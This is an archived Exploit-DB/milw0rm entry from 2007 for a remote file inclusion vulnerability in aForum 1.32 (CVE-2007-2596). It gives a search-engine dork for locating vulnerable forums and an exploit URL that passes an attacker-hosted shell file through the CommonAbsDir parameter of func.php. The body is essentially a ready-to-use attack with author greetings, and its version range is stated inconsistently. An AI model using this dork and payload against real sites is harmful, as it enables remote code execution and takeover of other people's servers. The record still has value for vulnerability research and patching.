aForum <= 1.32 CommonAbsDir Remote File Inclusion Vulnerability

2007-05-09T00:00:00
ID EDB-ID:3884
Type exploitdb
Reporter ThE TiGeR
Modified 2007-05-09T00:00:00

Description

aForum <= 1.32 (CommonAbsDir) Remote File Inclusion Vulnerability. CVE-2007-2596,CVE-2007-2634. Webapps exploit for php platform

                                        
                                            #AForum =&gt;1.33 Remote file inclusion (Func.php)

#Download Script : http://www.agner.org/software/msgbrd2/aforum.zip

#Thanks Str0ke

#D0rk:allintitle:List of messageboards

#Exploit :

#http://localhost/[aforum_path]/common/func.php?CommonAbsDir=shell.txt?

#Discovered By : ThE TiGeR

#Greetz : Reda, â„¢~${{BraveHeart}}$~â„¢

#Miro_Tiger100[at]Hotmail[dot]com

# milw0rm.com [2007-05-09]